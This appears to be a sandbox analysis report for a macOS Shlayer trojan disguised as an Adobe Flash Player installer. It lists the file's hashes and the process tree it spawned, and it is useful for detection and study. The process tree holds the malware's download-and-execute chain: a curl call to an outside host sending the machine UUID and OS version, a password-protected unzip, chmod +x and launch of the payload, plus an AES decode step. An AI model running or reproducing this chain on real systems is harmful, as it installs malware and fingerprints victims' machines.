Analysis
-
max time network
157s -
platform
macos_amd64 -
resource
macos -
submitted
24-06-2021 12:56
Static task
static1
General
-
Target
Shlayer.dmg
-
Size
244KB
-
MD5
b2b519602673e27aa40085deb8827bd1
-
SHA1
e827f4c1a1790c13cd761cdbf31cd2c0d7b25e55
-
SHA256
852ff1b97c1155fc28b14f5633a17de02dcace17bdc5aadf42e2f60226479eaf
-
SHA512
a635290927f22d4ba578d2afa05e0c27542fbdb1317e0fd829496966a315e9d16cf71302361a76d4acd2880c199bdd47eb8a10ff51b0b1a7f2cfbb6427adf029
Malware Config
Processes
-
/bin/shsh -c "sudo open /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app"1⤵PID:509
-
/bin/bashsh -c "sudo open /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app"1⤵PID:509
-
/usr/bin/sudosudo open /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app1⤵PID:509
-
/usr/bin/openopen /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app2⤵PID:510
-
-
/Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app/Contents/MacOS/LYwjtu0sc3XqkNVbQe_gM4YiRpmgUpRIew/Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app/Contents/MacOS/LYwjtu0sc3XqkNVbQe_gM4YiRpmgUpRIew1⤵PID:512
-
/usr/bin/dirnamedirname /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app/Contents/MacOS/LYwjtu0sc3XqkNVbQe_gM4YiRpmgUpRIew2⤵PID:513
-
-
/usr/bin/dirnamedirname /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app/Contents/MacOS2⤵PID:514
-
-
/usr/bin/curlcurl -f0L "http://api.macfantsy.com/sd/?c=q2BybQ==&u=C589348B-0863-5695-96A0-3DAE1B1C0B90&s=178FAAD3-6EEC-4A49-80E4-5AE9FA757182&o=10.15.1&b=2833846567"2⤵PID:1413
-
-
/usr/bin/unzipunzip -P 76564833825112833846567 /tmp/5bR1sgnKw -d /tmp/j9tx5Bwa/2⤵PID:1416
-
-
/bin/rmrm -f /tmp/5bR1sgnKw2⤵PID:1417
-
-
/bin/chmodchmod +x "/tmp/j9tx5Bwa//Contents/MacOS/*"2⤵PID:1425
-
-
/usr/bin/openopen -a /tmp/j9tx5Bwa/ --args s 178FAAD3-6EEC-4A49-80E4-5AE9FA757182 /Volumes/AdobeFlashPlayer2⤵PID:1426
-
-
/usr/bin/opensslopenssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:28338465671⤵PID:517
-
/usr/bin/base64base64 --decode /dev/fd/631⤵PID:521
-
/usr/bin/xxdxxd -pu /dev/fd/631⤵PID:524
-
/usr/bin/xxdxxd -r -p /dev/fd/631⤵PID:527
-
/usr/bin/sw_verssw_vers -productVersion1⤵PID:1401
-
/usr/bin/uuidgenuuidgen1⤵PID:1403
-
/usr/bin/trtr -dc "[[:print:]]"1⤵PID:1406
-
/usr/sbin/ioregioreg -rd1 -c IOPlatformExpertDevice1⤵PID:1408
-
/usr/bin/grepgrep -o "\"IOPlatformUUID\" = \"\\(.*\\)\""1⤵PID:1409
-
/usr/bin/sedsed -E -n "s@.*\"([^\"]+)\"@\\1@p"1⤵PID:1410
-
/usr/bin/mktempmktemp /tmp/XXXXXXXXX1⤵PID:1412
-
/usr/bin/mktempmktemp -d /tmp/XXXXXXXX1⤵PID:1415
-
/usr/bin/grepgrep -m1 -v "*.app" /dev/fd/631⤵PID:1420
-
/bin/lsls -1 /tmp/j9tx5Bwa/1⤵PID:1421
-
/usr/bin/sedsed -E -n "s@^(/Volumes/[^/]+)/.*@\\1@p"1⤵PID:1424